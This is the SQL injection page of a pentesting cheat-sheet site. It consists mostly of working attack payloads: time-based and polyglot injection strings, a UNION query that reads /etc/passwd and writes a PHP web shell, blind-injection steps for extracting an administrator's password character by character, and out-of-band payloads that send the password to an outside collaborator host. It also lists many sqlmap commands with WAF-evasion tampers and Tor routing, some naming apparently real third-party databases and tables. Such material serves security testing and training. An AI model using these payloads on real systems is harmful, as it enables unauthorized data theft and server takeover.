Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
Root domains
Subdomain Enum
Webs recon
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
General Info
Quick tricks
Header injections
Bruteforcing
Online hashes cracked
Crawl/Fuzz
LFI/RFI
File upload
SQLi
SSRF
Open redirects
XSS
CSP
XXE
Cookie Padding
Webshells
CORS
CSRF
Web Cache Poisoning
Broken Links
Clickjacking
HTTP Request Smuggling
Web Sockets
CRLF
IDOR
Web Cache Deception
Session fixation
Email attacks
Pastejacking
HTTP Parameter pollution
SSTI
Prototype Pollution
Command Injection
Deserialization
DNS rebinding
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
SQLi
SQL injection cheat sheet | Web Security Academy
WebSecAcademy
NetSPI SQL Injection Wiki
netspi

Common

1
/?q=1
2
/?q=1'
3
/?q=1"
4
/?q=[1]
5
/?q[]=1
6
/?q=1`
7
/?q=1\
8
/?q=1/*'*/
9
/?q=1/*!1111'*/
10
/?q=1'||'asd'||' <== concat string
11
/?q=1' or '1'='1
12
/?q=1 or 1=1
13
/?q='or''='
14
/?q=(1)or(0)=(1)
15
16
# Useful payloads
17
' WAITFOR DELAY '0:0:5'--
18
';WAITFOR DELAY '0:0:5'--
19
')) or sleep(5)='
20
;waitfor delay '0:0:5'--
21
);waitfor delay '0:0:5'--
22
';waitfor delay '0:0:5'--
23
";waitfor delay '0:0:5'--
24
');waitfor delay '0:0:5'--
25
");waitfor delay '0:0:5'--
26
));waitfor delay '0:0:5'--
Copied!

Polyglot

1
', ",'),"), (),., * /, <! -, -
2
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
3
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
Copied!

Resources by type

1
# MySQL:
2
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
3
https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
4
5
# MSQQL:
6
http://evilsql.com/main/page2.php
7
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
8
9
# ORACLE:
10
http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet
11
12
# POSTGRESQL:
13
http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet
14
15
# Others
16
http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
17
http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet
18
http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet
19
http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet
20
https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet
21
http://rails-sqli.org/
22
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
Copied!

R/W files

1
# Read file
2
UNION SELECT LOAD_FILE ("etc/passwd")--
3
4
# Write a file
5
UNION SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/tmp/shell.php"-
Copied!

Blind SQLi

1
# Conditional Responses
2
3
# Request with:
4
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
5
6
In the DDBB it does:
7
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' - If exists, show content or “Welcome back”
8
9
# To detect:
10
TrackingId=x'+OR+1=1-- OK
11
TrackingId=x'+OR+1=2-- KO
12
# User admin exist
13
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'-- OK
14
# Password length
15
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+length(password)>1--
16
17
# So, in the cookie header if first letter of password is greater than ‘m’, or ‘t’ or equal to ‘s’ response will be ok.
18
19
xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 'm'--
20
xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 't'--
21
xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) = 's'--
22
z'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+substring(password,6,1)='§a§'--
23
24
# Force conditional responses
25
26
TrackingId=x'+UNION+SELECT+CASE+WHEN+(1=1)+THEN+to_char(1/0)+ELSE+NULL+END+FROM+dual-- RETURNS ERROR IF OK
27
TrackingId=x'+UNION+SELECT+CASE+WHEN+(1=2)+THEN+to_char(1/0)+ELSE+NULL+END+FROM+dual-- RETURNS NORMALLY IF KO
28
TrackingId='+UNION+SELECT+CASE+WHEN+(username='administrator'+AND+substr(password,3,1)='§a§')+THEN+to_char(1/0)+ELSE+NULL+END+FROM+users--;
29
30
# Time delays
31
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
32
TrackingId=x'; IF (SELECT COUNT(username) FROM Users WHERE username = 'Administrator' AND SUBSTRING(password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
33
TrackingId=x'; IF (1=2) WAITFOR DELAY '0:0:10'--
34
TrackingId=x'||pg_sleep(10)--
35
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
36
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+substring(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
37
38
# Out-of-Band OAST (Collaborator)
39
Asynchronous response
40
41
# Confirm:
42
TrackingId=x'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//x.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
43
44
# Exfil:
45
TrackingId=x'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'[email protected]+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--
46
TrackingId=x'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--
Copied!

Second Order SQLi

1
# A second-order SQL Injection, on the other hand, is a vulnerability exploitable in two different steps:
2
1. Firstly, we STORE a particular user-supplied input value in the DB and
3
2. Secondly, we use the stored value to exploit a vulnerability in a vulnerable function in the source code which constructs the dynamic query of the web application.
4
5
# Example payload:
6
X' UNION SELECT user(),version(),database(), 4 --
7
X' UNION SELECT 1,2,3,4 --
8
9
# For example, in a password reset query with user "User123' --":
10
11
$pwdreset = mysql_query("UPDATE users SET password='getrekt' WHERE username='User123' — ' and password='[email protected]'");
12
13
# Will be:
14
15
$pwdreset = mysql_query("UPDATE users SET password='getrekt' WHERE username='User123'");
16
17
# So you don't need to know the password.
18
19
- User = ' or 'asd'='asd it will return always true
20
- User = admin'-- probably not check the password
Copied!

sqlmap

1
# Post
2
sqlmap -r search-test.txt -p tfUPass
3
4
# Get
5
sqlmap -u "http://10.11.1.111/index.php?id=1" --dbms=mysql
6
7
# Crawl
8
sqlmap -u http://10.11.1.111 --dbms=mysql --crawl=3
9
10
# Full auto - FORMS
11
sqlmap -u 'http://10.11.1.111:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch
12
# Columns
13
sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --columns -T users -D admin
14
# Values
15
sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --dump -T users -D admin
16
17
sqlmap -o -u "http://10.11.1.111:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --users --passwords
18
19
# SQLMAP WAF bypass
20
21
sqlmap --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
22
sqlmap --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
23
sqlmap --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
24
sqlmap -v3 --technique=T --no-cast --fresh-queries --banner
25
sqlmap -u http://www.example.com/index?id=1 --level 2 --risk 3 --batch --dbs
26
27
28
sqlmap -f -b --current-user --current-db --is-dba --users --dbs
29
sqlmap --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
30
sqlmap --risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs
31
sqlmap --random-agent --dbms=MYSQL --dbs --technique=B"
32
sqlmap --identify-waf --random-agent -v 3 --dbs
33
34
1 : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
35
2 : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3
36
37
sqlmap --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump
38
sqlmap --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent
39
sqlmap -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
40
sqlmap --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
41
sqlmap -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu
42
43
sqlmap --wizard
44
sqlmap --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
45
sqlmap -url www.site.ps/index.php --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql
46
sqlmap -url www.site.ps/index.php --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
47
48
# Tamper suggester
49
https://github.com/m4ll0k/Atlas
50
51
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent
52
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables
53
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns
54
--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump
55
# Tamper list
56
between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percent
Copied!
Previous
File upload
Next
SSRF
Last modified 1mo ago
Export as PDF
Copy link
Edit on GitHub
Contents
Common
Polyglot
Resources by type
R/W files
Blind SQLi
Second Order SQLi
sqlmap